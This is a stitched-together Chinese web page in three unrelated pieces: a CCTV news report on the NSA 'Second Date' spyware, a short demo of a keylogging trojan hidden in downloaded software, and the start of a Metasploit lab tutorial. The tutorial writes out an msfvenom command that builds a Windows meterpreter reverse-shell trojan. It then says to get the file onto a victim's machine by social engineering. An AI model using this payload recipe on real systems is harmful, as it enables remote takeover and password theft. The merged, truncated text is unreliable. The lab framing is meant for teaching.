日，國家計算機病毒應急處理中心和360公司對一款名為“二次約會”的間諜軟件進行了技術分析，分析報告顯示，該軟件是美國國家安全局（NSA）開發的網絡間諜武器。據了解，在國家計算機病毒應急處理中心會同360公司配合偵辦西北工業大學被美國國家安全局（NSA）網絡攻擊案過程中，成功提取了這款間諜軟件的多個樣本，并鎖定了這起網絡間諜行動背后美國國家安全局（NSA）工作人員的真實身份。

據技術分析報告顯示，“二次約會”間諜軟件是美國國家安全局（NSA）開發的網絡間諜武器，該軟件可實現網絡流量竊聽劫持、中間人攻擊、插入惡意代碼等惡意功能，它與其他惡意軟件配合可以完成復雜的網絡“間諜”活動。

國家計算機病毒應急處理中心高級工程師 杜振華：該軟件是具有高技術水平的網絡間諜工具，使攻擊者能夠全面接管被攻擊的（目標）網絡設備以及流經這些網絡設備的網絡流量，從而實現對目標網絡中主機和用戶的長期竊密，同時還可以作為下一階段攻擊的“前進基地”，隨時向目標網絡中投送更多網絡攻擊武器。

據專家介紹，“二次約會”間諜軟件長期駐留在網關、邊界路由器、防火墻等網絡邊界設備上，其主要功能包括網絡流量嗅探、網絡會話追蹤、流量重定向劫持、流量篡改等。另外，“二次約會”間諜軟件支持在各類操作系統上運行，同時兼容多種體系架構，適用范圍較廣。

國家計算機病毒應急處理中心高級工程師 杜振華：該間諜軟件通常是結合特定入侵行動辦公室（TAO）的各類針對防火墻、網絡路由器的網絡設備漏洞攻擊工具一并使用。一旦漏洞攻擊成功，攻擊者成功獲得了目標網絡設備的控制權限，就可以將這款網絡間諜軟件植入到目標的網絡設備中。

報告顯示，國家計算機病毒應急處理中心和360公司與業內合作伙伴在全球范圍開展技術調查，經層層溯源，發現了上千臺遍布各國的網絡設備中仍在隱蔽運行“二次約會”間諜軟件及其衍生版本，并發現被美國國家安全局（NSA）遠程控制的跳板服務器，其中多數分布在德國、日本、韓國、印度和中國臺灣。

國家計算機病毒應急處理中心高級工程師 杜振華：在多國業內伙伴的通力配合下，我們的聯合調查工作取得了突破性進展。目前已經成功鎖定了針對西北工業大學發動網絡攻擊的美國國家安全局（NSA）相關工作人員的真實身份。

（總臺央視記者 陳雷 張崗 陳慶濱 王子鑫）

來源：央視新聞

客是如何控制并監聽我們電腦的？

黑客是如何控制并監聽我們電腦的？

·這是我們在某個網站上下載的一個常用的軟件，黑客為了誘導我們安裝，通常都會對木馬進行包裝，看起來并沒有什么問題。

·我們來測試下運行木馬病毒后，你的用戶電腦是否被黑客監聽。運行軟件后，黑客電腦上已經提示連接成功了。

·現在來對用戶電腦做的鍵盤操作，做一個記錄，然后我們在用戶電腦上輸入文字，編輯文件，看看是否能夠被黑客監聽到。隨便打一些字試試看一下。

·好，現在來看看黑客電腦這邊能不能監聽到。可以看到，我們剛才在用戶電腦上打的字，都被黑客電腦監聽到。

·如果我們在登錄某些賬號，輸入賬號密碼的話，那么就可能會被黑客獲取到你的賬號密碼，從而導致你的賬號被盜。

所以說大家在下載軟件的時候，一定要去正規的網站下載。

、背景介紹

Metasploit就是一個漏洞框架。它的全稱叫做The Metasploit Framework，簡稱叫做MSF。Metasploit作為全球最受歡迎的工具，不僅僅是因為它的方便性和強大性，更重要的是它的框架。它允許使用者開發自己的漏洞腳本，從而進行測試。Metasploit(msf)究竟威力如何呢？如何利用木馬控制受害者主機呢？接下來讓我們一起學習！

二、資源裝備

1.安裝好 Win7的虛擬機一臺

2.整裝待發的小白一個。

3.安裝好的Kali Linux虛擬機一臺。

三、攻防實戰

3.1 將受害者主機（Windows7）跟攻擊者主機（Kali Linux）的網絡模式全部設置為NAT模式，如下圖所示。

步驟：打開虛擬機的設置/選擇網絡適配器/選擇NAT模式。

3.2 利用攻擊者主機（kali linux）的相關工具（msfvenom）生成對應的木馬文件，如下圖所示。

步驟1：msfvenom工具的參數介紹

-p, –payload < payload> 指定需要使用的payload(攻擊荷載)。也可以使用自定義payload,幾乎是支持全平臺的

-o, –out < path> 指定創建好的payload的存放位置。

-h, –help 查看幫助選項。

步驟2：msfvenom工具生成對應的木馬文件舉例，如下圖所示。

步驟3：查看攻擊者主機的主機IP地址，如下圖所示。

命令：ifconfig

步驟4：利用msfvenom工具生成對應的木馬文件，如下圖所示。

命令：msfvenom -p 指定需要使用的payload(攻擊荷載) lhost=攻擊者主機IP -f exe -o 生成木馬文件的保存位置

例子：msfVenom -p windows/meterpreter/reverse_tcp lhost=192.168.78.144 -f exe -o /root/hk.exe

步驟5：msfvenom工具生成木馬文件對應的命令運行結果如下圖所示。

Saved as:生成的木馬文件保存路徑。

步驟6：在已知的木馬文件保存路徑目錄下查找對應的木馬文件是否已經生成，如下圖所示，木馬文件已經存在（這里使用圖形化文件管理系統來查看，你也可以利用ls命令查看對應路徑下面是否已經生成對應的木馬文件）。

3.3 利用一定的社會工程學方法將生成的木馬文件發送到目標受害者主機，并且在受害者主機進行運行（對應的社會工程學知識請持續關注本號，后續講解）